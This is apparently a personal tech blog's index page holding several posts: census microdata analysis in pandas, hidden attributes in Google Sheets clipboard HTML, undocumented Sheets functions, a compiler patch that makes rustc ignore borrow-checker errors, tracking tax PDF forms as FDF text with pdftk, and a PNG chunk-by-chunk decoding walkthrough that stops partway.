
Everything

Last updated Aug 16, 2021

These are all the pages and posts on my website:

Playing with raw census data


Statistics Canada publishes “public use microdata files” that contain an anonymized random sample of census responses. The most recent version available is from the 2016 census. Statistics Canada hasn’t published microdata files for the 2021 census yet. The Individuals File for 2016 is a 2.7% sample of census responses.

Getting the data

It turns out you can’t just directly download the data. Instead, you have to fill out a form with information about yourself, and wait for your request to be manually processed. The wording of the form made it sound like they were going to mail me the data on a physical medium, but luckily I got an email with instructions a few days later instead. From there, I had to create an account on a website for exchanging data with Statistics Canada, and then finally I could log in and download the data from the CRSB_ADHOC_CENSUS_PUMF depot. Note that if you order any of the PUMF products you can access all of them with your E-transfer account.

If you want to work with the data without going through that process, you can download the data from Kaggle or the Internet Archive. Note that I didn’t include documentation files with that.

Using the data

The data is stored as a single file with a record on each line. Each field is stored in a specified range of characters on each line (left padded with spaces if needed). Fields are stored next to each other, and you can only separate them with knowledge of the schema. The schema is provided in a few formats, all of which are intended for use with proprietary statistical software.

I used one of the schema files that was somewhat easy to parse to generate a CSV version of the data, which just adds a header and sprinkles in some commas on each row. I found my CSV version was a lot easier to work with using pandas. Some of the schema data is lost this way though – if you use the raw data with the intended statistical software it will be able to use the schema to automatically infer the meaning of integer values in categorical columns, unlike with a simple CSV.
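Here's a rough sketch of that kind of conversion with pandas (the column positions and file names below are made up for illustration; the real layout comes from the schema files):

import pandas as pd

# Hypothetical field layout taken from the schema file: (name, start, end).
# The real Individuals File has far more fields than shown here.
layout = [("PPSORT", 0, 8), ("WEIGHT", 8, 19), ("AGEGRP", 19, 21)]

df = pd.read_fwf(
    "pumf_2016_individuals.dat",
    colspecs=[(start, end) for _, start, end in layout],
    names=[name for name, _, _ in layout],
)
df.to_csv("pumf_2016_individuals.csv", index=False)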

The data was sampled using stratified sampling, so not all rows have the same weight. As such, you need to multiply each row by the WEIGHT column to get accurate results. You can also use the WT1-WT16 columns in place of WEIGHT to get multiple smaller random samples – the WTX columns are 0 for most rows, but correspondingly bigger on rows where they are non-zero.

I’ve done some experimenting with the data using the Python pandas library. See this notebook for the full details on how I got these results. One simple thing we can do is determine the total population. By adding up all the weights, we get the population of Canada on the census reference date (May 10, 2016):

>>> df = pd.read_csv("/path/to/data.csv")
>>> df["WEIGHT"].sum()
34460064.00006676

Let’s see what other columns we have available to work with:

>>> df.columns.values
array(['PPSORT', 'WEIGHT', 'WT1', 'WT2', 'WT3', 'WT4', 'WT5', 'WT6',
       'WT7', 'WT8', 'WT9', 'WT10', 'WT11', 'WT12', 'WT13', 'WT14',
       'WT15', 'WT16', 'ABOID', 'AGEGRP', 'AGEIMM', 'ATTSCH', 'BEDRM',
       'BFNMEMB', 'CAPGN', 'CFINC', 'CFINC_AT', 'CFSIZE', 'CFSTAT',
       'CHDBN', 'CHLDC', 'CIP2011', 'CIP2011_STEM_SUM', 'CITIZEN',
       'CITOTH', 'CMA', 'CONDO', 'COW', 'CQPPB', 'DETH123', 'DIST',
       'DPGRSUM', 'DTYPE', 'EFDECILE', 'EFDIMBM', 'EFINC', 'EFINC_AT',
       'EFSIZE', 'EICBN', 'EMPIN', 'ETHDER', 'FOL', 'FPTWK', 'GENSTAT',
       'GOVTI', 'GTRFS', 'HCORENEED_IND', 'HDGREE', 'HHINC', 'HHINC_AT',
       'HHMRKINC', 'HHSIZE', 'HHTYPE', 'HLAEN', 'HLAFR', 'HLANO', 'HLBEN',
       'HLBFR', 'HLBNO', 'IMMCAT5', 'IMMSTAT', 'INCTAX', 'INVST', 'KOL',
       'LFACT', 'LICO', 'LICO_AT', 'LOC_ST_RES', 'LOCSTUD', 'LOLIMA',
       'LOLIMB', 'LOMBM', 'LSTWRK', 'LWAEN', 'LWAFR', 'LWANO', 'LWBEN',
       'LWBFR', 'LWBNO', 'MARSTH', 'MOB1', 'MOB5', 'MODE', 'MRKINC',
       'MTNEN', 'MTNFR', 'MTNNO', 'NAICS', 'NOC16', 'NOCS', 'NOL', 'NOS',
       'OASGI', 'OTINC', 'PKID0_1', 'PKID15_24', 'PKID2_5', 'PKID25',
       'PKID6_14', 'PKIDS', 'POB', 'POBF', 'POBM', 'POWST', 'PR', 'PR1',
       'PR5', 'PRESMORTG', 'PRIHM', 'PWDUR', 'PWLEAVE', 'PWOCC', 'PWPR',
       'REGIND', 'REPAIR', 'RETIR', 'ROOMS', 'SEMPI', 'SEX', 'SHELCO',
       'SSGRAD', 'SUBSIDY', 'TENUR', 'TOTINC', 'TOTINC_AT', 'VALUE',
       'VISMIN', 'WAGES', 'WKSWRK', 'WRKACT', 'YRIMM'], dtype=object)

The meaning of all of those columns is documented in the handy user guide for the data.

Working with categorical data

The KOL column indicates people’s Knowledge Of the official Languages of Canada (English and French). Let’s make a graph of the data:

A bar chart
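For reference, here is roughly how a chart like that can be produced: group by KOL, sum the weights, and plot. The code-to-label mapping below is my reading of the user guide, so double-check it against the documentation.

import matplotlib.pyplot as plt

# Weighted counts: sum the survey weights within each KOL category.
kol_counts = df.groupby("KOL")["WEIGHT"].sum()

# Assumed code-to-label mapping; verify against the user guide.
kol_labels = {1: "English only", 2: "French only",
              3: "English and French", 4: "Neither"}
kol_counts.rename(index=kol_labels).plot(kind="bar")
plt.suptitle("Knowledge of official languages")
plt.show()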

Working with numeric data

The WAGES column has the total wages of respondents (according to income tax data) in Canadian dollars in 2015. According to the user guide, 88888888 and 99999999 are special values that indicate that no data is available or applicable. Let’s try making a histogram of all values with data available:

import matplotlib.pyplot as plt

plt.suptitle("Total wages")
# Drop the 88888888/99999999 "not available/not applicable" sentinel values.
all_person_wages_df = df[df["WAGES"] < 80000000]
# Weighting each response by its wage makes each bar the total wages in that range.
all_person_wages_df["WAGES"].plot(
    kind="hist", bins=250, weights=all_person_wages_df["WAGES"]
)

A histogram

That looks weird. It appears that values above $100,000 are rounded to prevent any row from personally identifying an individual, which makes this histogram all wacky. If we change it to only plot people with total wages under $100,000, it looks fine:

A histogram
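That version just tightens the mask, along these lines (the variable name is mine):

under_100k_df = df[df["WAGES"] < 100000]
under_100k_df["WAGES"].plot(
    kind="hist", bins=250, weights=under_100k_df["WAGES"]
)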

Making a good looking histogram that includes people who make over $100,000 is left as an exercise to the reader.


Hidden HTML markup Google Sheets adds to the clipboard


Google Docs/Sheets/Slides/Drawings (which all share a lot of code) support copying content created in them (such as text, images, spreadsheet cells, and shapes) to the clipboard and pasting it into another doc/sheet/slideshow/drawing, which might be different from the origin document. Content is copied to the clipboard as HTML, which means hidden markup can be inserted to support copying complex objects that can’t easily be represented as ordinary HTML.

For example, copying a smiley face shape to the clipboard results in this HTML:

<span id="docs-internal-guid-7d347fee-7fff-afd7-ca79-41b3a53d7fad">&nbsp;</span>

The internal GUID id is used to keep track of the underlying data. You can copy and paste the shape within a document, and it’ll know to duplicate the existing smiley face by looking up the GUID. This also works when pasting into another document in the same browser – it stores the GUID ⇔ data mapping in the browser’s local storage. Trying to paste it into another open browser just results in an empty text box being pasted, since the other browser doesn’t have any data stored for the pasted GUID. GUID linking allows these Google apps to store more data on the clipboard than would otherwise be supported.

Google Sheets takes a different approach than Docs/Slides/Drawings to storing additional data on the clipboard. In this example, the second column has a formula that doubles the first column (=2*A1) – here’s what that looks like when pasted:

3 6

And here’s the (formatted) HTML that gets copied to the clipboard:

<style type="text/css">td { border: 1px solid #ccc; } br { mso-data-placement: same-cell; }</style>
<table
  style="
    table-layout:fixed;font-size:10pt;font-family:Arial;
    width:0px;border-collapse:collapse;border:none
  "
  dir="ltr" cellspacing="0" cellpadding="0" border="1"
>
  <colgroup>
    <col width="100">
    <col width="100">
  </colgroup>
  <tbody>
    <tr style="height:21px;">
      <td
        style="
          overflow:hidden;padding:2px 3px 2px 3px;
          vertical-align:bottom;text-align:right;
        "
        data-sheets-value="{&quot;1&quot;:3,&quot;3&quot;:3}"
      >3</td>
      <td
        style="
          overflow:hidden;padding:2px 3px 2px 3px;
          vertical-align:bottom;text-align:right;
        "
        data-sheets-value="{&quot;1&quot;:3,&quot;3&quot;:6}"
        data-sheets-formula="=2*R[0]C[-1]"
      >6</td>
    </tr>
  </tbody>
</table>

Instead of inserting an opaque GUID into the clipboard, Google Sheets puts all the relevant data in data- attributes on the copied markup: the data-sheets-value and data-sheets-formula attributes encode the value and formula of each cell.

For cells whose value is determined by a formula, data-sheets-formula contains that formula. Cell references (such as A2) are converted to relative references1, such as R[0]C[-1] for the cell one column to the left2. This format is different from the internal (unexposed) representation, which represents cell contents as structured data. (Fun fact: formulas are also internally stored in a stack-based language that describes their execution; that formula gets stored as LD2]R3]F*:2]S)

The data-sheets-value attribute is a JSON object containing the value in the cell. The "1" field is an integer giving the data type, and the value itself is stored under a field whose name is that type number, encoded in whatever way that type uses. For example, the type for boolean values is 4, so FALSE gets encoded as {"1":4,"4":0}. The textual representation of the value is separate from the actual value, and only the data-sheets-value attribute is checked when pasting in cells. The actual text content of the <td> element is ignored.
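As a rough illustration (my own parsing sketch, not anything Google provides), here's how those attributes can be pulled out of clipboard HTML with Python's standard library:

import json
from html.parser import HTMLParser

class SheetsClipboardParser(HTMLParser):
    """Collect data-sheets-value/data-sheets-formula from pasted <td> elements."""
    def __init__(self):
        super().__init__()
        self.cells = []

    def handle_starttag(self, tag, attrs):
        if tag != "td":
            return
        attrs = dict(attrs)
        value = attrs.get("data-sheets-value")
        self.cells.append({
            # "1" holds the type tag; the value itself lives under that type's key
            "value": json.loads(value) if value else None,
            "formula": attrs.get("data-sheets-formula"),
        })

clipboard_html = """
<td data-sheets-value="{&quot;1&quot;:3,&quot;3&quot;:3}">3</td>
<td data-sheets-value="{&quot;1&quot;:3,&quot;3&quot;:6}"
    data-sheets-formula="=2*R[0]C[-1]">6</td>
"""
parser = SheetsClipboardParser()
parser.feed(clipboard_html)
print(parser.cells)
# [{'value': {'1': 3, '3': 3}, 'formula': None},
#  {'value': {'1': 3, '3': 6}, 'formula': '=2*R[0]C[-1]'}]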

An odd consequence of the way values are stored is that if you copy cells from Google Sheets, edit them in an external HTML editor, then paste them back in, your modifications don’t get reflected in the pasted cells. It also means that if you copy some text into an HTML editor, then change the text, the original text is still around in an attribute.

The data-sheets-value attribute was how I first noticed these attributes. I have a habit of looking at the raw sources of emails I receive, so I noticed when I received an HTML email with parts copied from a spreadsheet, with slightly different text in the data-sheets-value attribute than the body of the email. Be sure to keep in mind that the reader can see the originally pasted text when pasting from Google Sheets into an HTML document!


  1. Except for references like $A$1, where the dollar signs explicitly disable this behaviour. In that case it’s stored as an absolute reference, such as R3C2↩︎

  2. You can’t use R1C1 notation when writing a formula directly in Sheets, pasting it in is the only way to use it (unlike Excel). However, INDIRECT does allow this notation when the second parameter is FALSE↩︎

Undocumented Google Sheets formula functions



Google Sheets has several functions that can be used in formulas. By looking at the source code, we can find a list of all available formula functions. By diffing that against the list of formula functions in the documentation, we can get a list of undocumented functions.

The reason for not documenting these functions varies, but I’ve made some arbitrary guesses as to what’s going on with these functions.

All of these are called in the normal way: by writing something like =DEBUG_THROW_ERROR() or =UNARY_PLUS("3") into a cell.

I find these undocumented functions (and the reasons for that) weirdly interesting. I hope you do too!

Debugging functions

The code that references the names of these functions is nested deep in the formula evaluation process – I missed these the first time I looked for undocumented formulas. Here they are:

  • DEBUG_THROW_ERROR throws an error when evaluated, and results in a popup saying

    There was an error during calculation. Some formulae may not be calculated successfully. Undo your last change and try again.

    A screen-covering modal dialog appears after you do this, so the only way to fix a spreadsheet containing this function is to delete the offending cell before formula evaluation starts after the page loads.

  • DEBUG_TOKEN_INDEX returns the index of the formula token that calls the function

  • DEBUG_CONDITIONAL takes a cell range and returns nothing

  • DEBUG_OPTIONAL_RANGE_REF optionally takes a cell range and returns a number

Easter eggs

A few functions appear to be easter eggs:

  • WHATTHEFOXSAY returns a random thing that foxes say, and actually has some use cases
  • COINFLIP is randomly either TRUE or FALSE. It appears to only recalculate once per spreadsheet modification, unlike RAND.
  • CURSORPARK provides a nice cursor park:
    🌳	🌳	🌳	🌳	🌳	🌳	🌳	🌳
    🌳	 	 	  	🐝 	  	🐌	🌳
    🌳	 	🐇	  	  	  	  	🌳
    🌳	🌻	 	  	  	  	🐑	🌳
    🌳	🌳	🌳	🌳	🌳	🌳	🌳	🌳
    
  • DUCKHUNT results in a duck emoji: 🦆
  • RITZCODERZ and TRIXTERNS list people who presumably worked on Google Sheets: trix is the codename for Google Sheets (maTRIX), and I think ritz is the codename for the 2013 rewrite.

Lambdas

BYCOL, BYROW, CALL, CONTINUE.LEGACY, LAMBDA, MAKEARRAY, MAP, REDUCE, SINGLE, SCAN

Excel has support for lambda functions, and it seems that Google Sheets may soon also gain support for them! Currently, they are treated as if they don’t exist if you type them in (there is probably a flag that the Sheets developers can set to test them). At one point these functions accidentally had in-editor documentation.

Legacy functions

AND.LEGACY, COUNTA.LEGACY, COUNTIF.LEGACY, DAY.LEGACY, HOUR.LEGACY, MATCH.LEGACY, MEDIAN.LEGACY, MINUTE.LEGACY, MMULT.LEGACY, MONTH.LEGACY, OR.LEGACY, ROUND.LEGACY, SECOND.LEGACY, SUMIF.LEGACY, SUM.LEGACY, TEXT.LEGACY, VLOOKUP.LEGACY, YEAR.LEGACY

These are variants of documented formulas, but with .LEGACY appended. The legacy variants of boolean functions treat all strings as falsey, while the normal variants automatically parse "true"/"false" into boolean values. Perhaps an earlier version of Sheets had the wrong behaviour, and there’s some logic to convert old calls to these functions to the legacy versions?

Variant versions

ISDATE_STRICT, ISDATETIME_STRICT, ISTIME_STRICT, and STDEV.INEXACT are all variants of their main functions. Probably for the same reasons as the *.LEGACY functions?

Unimplemented Excel compatibility

CUBEKPIMEMBER, CUBEMEMBER, CUBEMEMBERPROPERTY, CUBERANKEDMEMBER, CUBESET, CUBESETCOUNT, CUBEVALUE, FIELDVALUE, INFO, NOEXPAND, REGISTER.ID, RTD, WEBSERVICE

These formulas are treated as not existing, except the error message is different:

This function is not fully supported in Sheets. Please see the help centre for more information.

Despite what that error might imply, these functions are not supported at all. I think this is just to give a better error message for imported Excel files with unsupported formulas.

Conditions

CONDITION_BLANK, CONDITION_BLANK.INEXACT, CONDITION_EQ, CONDITION_LT, CONDITION_LT.INEXACT, CONDITION_NE, CONDITION_ONE_OF_RANGE, CONDITION_ONE_OF_RANGE.INEXACT, and CONDITION_TEXT_EQ are used internally when applying conditional formatting and data validation, where the “Format cells if…” input allows either using a custom formula or selecting a comparison option from a menu; the menu options are implemented with these functions.

CONDITION_FLATTEN and CONDITION_GRADIENT are used internally for conditional formatting gradients.

Replaced functions

These functions are treated as not existing, except the error message is:

The X function has been replaced with the Y function.

GOOGLECLOCK used to return the time on Google’s servers, but the suggested replacement NOW returns the time on the current system. Perhaps Google thought that supporting GOOGLECLOCK wasn’t worth it when NOW is usually good enough?

GOOGLEREADER presumably did something to do with Google Reader, before Reader was shut down. The suggested replacement is IMPORTFEED.

Internal

ARRAY_LITERAL and ARRAY_ROW are used internally to transform array syntax (like {1,2,3}) into function calls.

ARRAY_LITERAL gets a passing mention in a 2013 video introducing the new Google sheets (probably by accident), but has no other documentation.

Not yet implemented

With XLOOKUP and XMATCH, if you provide the wrong number of arguments it gives an error complaining about the wrong number of arguments, but if you provide the right number it claims the function doesn’t exist. This is probably because they are currently partially implemented versions of their Excel counterparts.

Unknown

UNARY_{PLUS,MINUS} function the same as the documented function U{PLUS,MINUS}. I don’t know why they exist. At first I thought they were internally used to implement unary prefixes in formulas like =+("5"), but that gets translated to a call to UPLUS (which is documented) internally.

Accidentally undocumented

BAHTTEXT, BINOM.DIST.RANGE, COUNTUNIQUEIFS, and PERCENTIF are all fairly normal functions, and all have documentation shown when typing the function into the formula input, but they aren’t included in the list of functions in the documentation. They do have documentation pages of their own, though. The exclusion from the list of formulas seems to be an oversight.

REFERENCE is entirely undocumented, for reasons unbeknownst to me. You can use it to get all the cells in a specified range. It’s redundant to the documented ARRAYFORMULA function: REFERENCE(A1, B2) is the same as ARRAYFORMULA(A1:B2). Excel doesn’t appear to have a similar function.

Bonus: foreign languages

A lesser-known (but documented) feature of Sheets and Excel that I found while writing this is support for localized formula names in some languages. You can write =KÜRZEN(5.5) (make sure to put the umlaut on the Ü) instead of =TRUNC(5.5) if you prefer to write your spreadsheets in German.


Turning off Rust's borrow checker, completely


I recently came across #[you_can::turn_off_the_borrow_checker], a Rust macro that “turns off” the borrow checker for a function. It rewrites the function’s reference manipulations into unsafe code that does the same thing without the borrow checker noticing.

Of course, this is not the sort of thing you would want to use in production, or really for anything other than education and experimentation. However, it made me curious if it could be implemented at a lower level: can we patch the compiler to remove the borrow checker? Yes.

The obvious way to do that would be to just not run the pass that does borrow checking. The analysis pass (technically it’s a query not a pass but that’s not relevant here) of the compiler does a lot of things, including some borrow checking. Let’s just not run the analysis pass! Just return early so that no analysis is run:

fn analysis(tcx: TyCtxt<'_>, (): ()) -> Result<()> {
    return Ok(()); // don't actually do any analysis!
    ...

That makes it so the rest of the function isn’t run, and causes an unreachable statement warning when compiling the compiler.

This kinda works. Most valid Rust code still works with this patched compiler. It is occasionally prone to internal compiler errors (ICEs), and sometimes you get extra bonus errors as a result of parts of the compiler assuming that parts of the analysis have been performed. But alas, removing the analysis pass still leaves some borrow checking in place. We’re going to need to use the nuclear option: ignoring errors entirely. Deep within the part of the compiler that emits errors is HandlerInner::emit_diagnostic, which emits an error diagnostic. Part of that function checks if we’re emitting an error, and if so increments a counter:

if matches!(diagnostic.level, Level::Error { lint: true }) {
    self.bump_lint_err_count();
}

Before starting codegen, the compiler checks if the error count is non-zero, and aborts if so. But if we just remove that call to bump_lint_err_count, the number of errors will always be zero. The errors will still be displayed, but won’t prevent compilation from succeeding. Normally the compiler doesn’t bail after an error but keeps going, and then only aborts before the next phase of compilation. This makes it so if there are multiple errors with some code, you get to see all of them at once. But by not incrementing the error count, we’ll fool the compiler into thinking there are no errors! Here’s the patch if you want to follow along at home.

This means that errors are generated and displayed, but the patched compiler just ignores the fact that there are errors and tries to generate code anyways.

This approach can’t get past some fatal errors that stop compilation right away, but luckily most errors let the compiler keep going until some future stopping point (and that future stopping point never comes now, since the error count is always 0).

At this point, I was pretty sure that this wouldn’t actually work. It does. Here’s an example of Rust code that the borrow checker doesn’t like:

fn hold_my_vec<T>(_: Vec<T>) {}

fn main() {
    let v = vec![2, 3, 5, 7, 11, 13, 17];
    hold_my_vec(v);
    let element = v.get(3);

    println!("I got this element from the vector: {:?}", element);
}

And here’s what happens when we run that through our patched compiler:

error[E0382]: borrow of moved value: `v`
    --> src/main.rs:6:19
     |
4    |     let v = vec![2, 3, 5, 7, 11, 13, 17];
     |         - move occurs because `v` has type `Vec<i32>`, which does not implement the `Copy` trait
5    |     hold_my_vec(v);
     |                 - value moved here
6    |     let element = v.get(3);
     |                   ^^^^^^^^ value borrowed here after move
     |
     = note: borrow occurs due to deref coercion to `[i32]`
note: deref defined here
    --> /home/smit/rustc-dev/rust/library/alloc/src/vec/mod.rs:2434:5
     |
2434 |     type Target = [T];
     |     ^^^^^^^^^^^^^^^^^^

For more information about this error, try `rustc --explain E0382`.
    Finished dev [unoptimized + debuginfo] target(s) in 0.00s
     Running `target/debug/rustnoerror`
I got this element from the vector: Some(-501713657)

There’s an error, but due to our patch the compiler just keeps going along. And as a result, the compiled program produces garbage data: Some(-501713657) is not an element in the list.

Here’s how it handles an example from #[you_can::turn_off_the_borrow_checker]:

error[E0499]: cannot borrow `owned` as mutable more than once at a time
  --> src/main.rs:6:22
   |
5  |     let mut_1 = &mut owned[0];
   |                      ----- first mutable borrow occurs here
6  |     let mut_2 = &mut owned[1];
   |                      ^^^^^ second mutable borrow occurs here
...
10 |     let undefined = *mut_1 + *mut_2;
   |                     ------ first borrow later used here

error[E0505]: cannot move out of `owned` because it is borrowed
  --> src/main.rs:9:10
   |
5  |     let mut_1 = &mut owned[0];
   |                      ----- borrow of `owned` occurs here
...
9  |     drop(owned);
   |          ^^^^^ move out of `owned` occurs here
10 |     let undefined = *mut_1 + *mut_2;
   |                     ------ borrow later used here

Some errors have detailed explanations: E0499, E0505.
For more information about an error, try `rustc --explain E0499`.
    Finished dev [unoptimized + debuginfo] target(s) in 0.00s
     Running `target/debug/rustnoerror`
1511396695

Again, it just outputs garbage data.

Here are the fun ways our patched compiler handles various error conditions:

  • Many result in an internal compiler error since codegen assumes that other parts of the compiler did their job
  • If you have non-exhaustive patterns, the compiled program tries to execute an illegal instruction and core dumps
  • Sometimes format strings that reference variables affected by errors cause an ICE, so you effectively have to always do std::io::stdout().write_all(...) instead of println!

Please remember not to use this for anything other than testing!


Tracking PDF forms as plain text


The Canada Revenue Agency, the agency responsible for collecting taxes in Canada, publishes many tax forms. These are usually available as a fillable PDF. With fillable PDFs, you can type in answers to form fields, save the PDF, and the saved PDF contains your answers.

I want to be able to keep track of the PDFs with my answers in them with Git, but tracking the PDFs with my answers in them doesn’t work very well: you can’t easily diff them, merge conflicts are difficult to resolve, and Git doesn’t work well with large binary files.

I was able to find a good way to deal with this: extracting the data in PDF form fields to a standalone .fdf file. This file has just the data in the form fields. We can use pdftk-java to extract the FDF from a PDF file. Some older versions are prone to crashing with certain PDFs that have filled forms, so make sure you are using a recent version.

$ pdftk t1.pdf generate_fdf output t1.fdf
$ cat t1.fdf | head -n 35
%FDF-1.2
%����
1 0 obj

<<
/FDF
<<
/Fields [
<<
/T (form1[0])
/Kids [
<<
/T (Page3[0])
/Kids [
<<
/T (Step2[0])
/Kids [
<<
/T (Line_10400_OtherEmploymentIncome[0])
/Kids [
<<
/T (Line_10400_Amount[0])
/V (47834.42)
>>]
>>
<<
/T (Line_12100_InvestmentIncome[0])
/Kids [
<<
/T (Line_12100_Amount[0])
/V (52455.55)
>>]

The FDF format is a tad verbose (it is a stripped down version of the PDF file format), but all of the form inputs are there: $47834.42 for my other employment income, and $52455.55 for my investment income. All of the other form inputs are in the file. pdftk generates the inputs in a weird order: it decided to start with step 2 on page 3. It seems to be consistent though, so there shouldn’t be any big changes in diffs.

We can merge a modified FDF file back into the PDF similarly:

pdftk t1.pdf fill_form t1.fdf output filled.pdf

My general workflow is to take the existing FDF and create a filled PDF, edit that filled PDF, save it, then extract the new FDF. This way I can keep track of the file as a plaintext file tracked in Git, with diffs and merges working as expected.
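If you want to script that round trip, a small wrapper around the same pdftk commands does the job (the helper names and file names here are just placeholders):

import subprocess

def fill(blank_pdf, fdf, out_pdf):
    # pdftk <form>.pdf fill_form <data>.fdf output <filled>.pdf
    subprocess.run(["pdftk", blank_pdf, "fill_form", fdf, "output", out_pdf], check=True)

def extract(filled_pdf, out_fdf):
    # pdftk <filled>.pdf generate_fdf output <data>.fdf
    subprocess.run(["pdftk", filled_pdf, "generate_fdf", "output", out_fdf], check=True)

fill("t1.pdf", "t1.fdf", "filled.pdf")   # edit filled.pdf in a PDF viewer...
extract("filled.pdf", "t1.fdf")          # ...then regenerate the tracked FDF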

Manipulating the form with a full PDF viewer, instead of typing values directly into the FDF file, ensures that the data you put in is validated. PDF files can have arbitrary embedded JavaScript to validate form inputs. The CRA takes extensive advantage of this feature, with ~4000 lines of common validation logic shared across all of their PDF forms. Unfortunately, not all PDF readers fully support PDF JavaScript, so most of the validation doesn’t work if you aren’t using an official PDF reader from Adobe.

XFDF is an XML-based version of FDF that seems nicer to work with, but it doesn’t have much support in the PDF tools ecosystem. Hopefully, more tools will gain the ability to deal with XFDF, since it’s a much nicer format to deal with than FDF.

Digression: Why use paper forms at all?

Question
If you’re going to track your answers electronically, why use the PDFs at all? Why not just use NETFILE and directly store the data?
I had looked into using NETFILE to directly store the tax return data as a .tax file. Unfortunately, only certified tax software can actually file returns using the service. You can’t even access the API documentation without being certified.

They don’t even let you send them filled PDFs electronically! I would be willing to directly send them my filled PDFs, but instead I have to print them out, mail the printed PDF to them, and have someone at the CRA type my form back into their system!

Each step of decoding a PNG

<div>
    <p>Let's look at the complete process of decoding a <abbr title="Portable Network Graphics">PNG</abbr> file. Here's the image I'll be using to demonstrate:</p>
    <img src="https://smitop.com/avatar/a256.png" width="256" height="256" alt="Several letter 'S's on top of each other, each with a different color." />
</div>
<div>
    <h2>Chunking</h2>
    <p>PNG files are stored as a series of chunks. Each chunk has a 4 byte length, 4 byte name, the actual data, and a CRC. Most of the chunks contain metadata about the image, but the <code>IDAT</code> chunk contains the actual compressed image data. The capitalization of each letter of the chunk name determines how unexpected chunks should be handled:</p>
    <table class="chunk-char-table">
        <tbody>
            <tr><th>UPPERCASE</th><th>lowercase</th></tr>
            <tr><td>Critical</td><td>Ancillary</td><td>Is this chunk required to display the image correctly?</td></tr>
            <tr><td>Public</td><td>Private</td><td>Is this a private, application-specific, chunk?</td></tr>
            <tr><td>Reserved</td><td>Reserved</td><td></td></tr>
            <tr><td>Safe to copy</td><td>Unsafe to copy</td><td>Do programs that modify the PNG data need to understand this chunk?</td></tr>
        </tbody>
    </table>
    <img src="https://smitop.com/Chunk-letters.svg" alt="c: Ancillary, H: Public, R: Reserved, M: Unsafe to copy" width="571" height="251" />
    <p>Here are the chunks in the image:</p>
    <input type="checkbox" id="all-chunks"><label for="all-chunks"> Show metadata chunks</label>
    <div class="chunks">
        <div class="chunk chunk-important">
            <div class="chunk-top"><div class="chunk-header">Signature</div> This identifies the image as a PNG. It contains newline characters and other characters that often get mangled, so that corruption of the binary image data can be detected.</div>
            <div class="length"><span> <span class="chunk-bytes"> 89 50 4E 47 0D 0A 1A 0A</span> </span></div>
        </div>
        <div class="chunk chunk-IHDR chunk-important">
<div class="chunk-top"><div class="chunk-header">Header</div> This contains metadata about the image.</div>
<div class="length"><span class="chunk-label">Length</span><span><span class="chunk-bytes"> 00 00 00 0D</span> = 13 bytes long</span></div>
<div class="type"><span class="chunk-label">Type</span><span><span class="chunk-bytes"> 49 48 44 52</span> = IHDR</span></div>
<div class="type">
    <span class="chunk-label">Data</span>
    <span>
        <span  class="chunk-bytes"> 00 00 01 00 00 00 01 00 08 02 00 00 00</span>
        <table>
<tbody>
    <tr><th>Width</th><td>256</td></tr>
    <tr><th>Height</th><td>256</td></tr>
    <tr><th>Bit depth</th><td>8</td></tr>
    <tr><th>Color space</th><td>Truecolor RGB</td></tr>
    <tr><th>Compression method</th><td>0</td></tr>
    <tr><th>Filter method</th><td>0</td></tr>
    <tr><th>Interlacing</th><td>disabled</td></tr>
</tbody>
        </table>
    </span>
</div>
<div class="crc"><span class="chunk-label">CRC</span><span class="chunk-bytes"> D3 10 3F 31</span></div>
        </div>
        <div class="chunk chunk-gAMA chunk-extra">
            <div class="chunk-top"><div class="chunk-header">Gamma</div> This contains the image gamma, used to display more accurate colours.</div>
            <div class="length"><span class="chunk-label">Length</span><span><span class="chunk-bytes"> 00 00 00 04</span> = 4 bytes long</span></div>
            <div class="type"><span class="chunk-label">Type</span><span><span class="chunk-bytes"> 67 41 4D 41</span> = gAMA</span></div>
            <div class="type"><span class="chunk-label">Data</span><span><span class="chunk-bytes"> 00 00 B1 8F</span> = 45455</span></div>
            <div class="crc"><span class="chunk-label">CRC</span><span class="chunk-bytes"> 0B FC 61 05</span></div>
        </div>
        <div class="chunk chunk-cHRM chunk-extra">
            <div class="chunk-top"><div class="chunk-header">Color space information</div> This contains data about where in the full CIE color space the colors in the image are, so that monitors that support colors outside the standard sRGB space can display the image better.</div>
            <div class="length"><span class="chunk-label">Length</span><span><span class="chunk-bytes"> 00 00 00 20</span> = 32 bytes long</span></div>
            <div class="type"><span class="chunk-label">Type</span><span><span class="chunk-bytes"> 63 48 52 4D</span> = cHRM</span></div>
            <div class="type"><span class="chunk-label">Data</span><span class="chunk-bytes"> 00 00 7A 26 00 00 80 84 00 00 FA 00 00 00 80 E8 00 00 75 30 00 00 EA 60 00 00 3A 98 00 00 17 70</span></div>
            <div class="crc"><span class="chunk-label">CRC</span><span class="chunk-bytes"> 9C BA 51 3C</span></div>
        </div>
        <div class="chunk chunk-pHYs chunk-extra">
            <div class="chunk-top"><div class="chunk-header">Physical dimensions</div> This contains the physical dimensions of the image, so it can be displayed at the right physical size when possible.</div>
            <div class="length"><span class="chunk-label">Length</span><span><span class="chunk-bytes"> 00 00 00 09</span> = 9 bytes long</span></div>
            <div class="type"><span class="chunk-label">Type</span><span><span class="chunk-bytes"> 70 48 59 73</span> = pHYs</span></div>
            <div class="type"><span class="chunk-label">Data</span><span><span class="chunk-bytes"> 00 00 0B 13 00 00 0B 13 01</span> (2835 pixels = 1 metre)</span></div>
            <div class="crc"><span class="chunk-label">CRC</span><span class="chunk-bytes"> 00 9A 9C 18</span></div>
        </div>
        <div class="chunk chunk-tIME chunk-extra">
            <div class="chunk-top"><div class="chunk-header">Last modification date</div> This contains the time the image was created at.</div>
            <div class="length"><span class="chunk-label">Length</span><span><span class="chunk-bytes"> 00 00 00 07</span> = 7 bytes long</span></div>
            <div class="type"><span class="chunk-label">Type</span><span><span class="chunk-bytes"> 74 49 4D 45</span> = tIME</span></div>
            <div class="type"><span class="chunk-label">Data</span><span><span class="chunk-bytes"> 07 E5 05 0A 0A 2F 2C</span> = 2021-05-10, 10:47:44 (UTC)</span></div>
            <div class="crc"><span class="chunk-label">CRC</span><span class="chunk-bytes"> 00 53 9E DD</span></div>
        </div>
        <div class="chunk chunk-bKGD chunk-extra">
            <div class="chunk-top"><div class="chunk-header">Background color</div> This contains the background color of the image, to be displayed while the image is loading.</div>
            <div class="length"><span class="chunk-label">Length</span><span><span class="chunk-bytes"> 00 00 00 06</span> = 6 bytes long</span></div>
            <div class="type"><span class="chunk-label">Type</span><span><span class="chunk-bytes"> 62 4B 47 44</span> = bKGD</span></div>
            <div class="type"><span class="chunk-label">Data</span><span><span class="chunk-bytes"> 00 FF 00 FF 00 FF</span> = white</span></div>
            <div class="crc"><span class="chunk-label">CRC</span><span class="chunk-bytes"> A0 BD A7 93</span></div>
        </div>
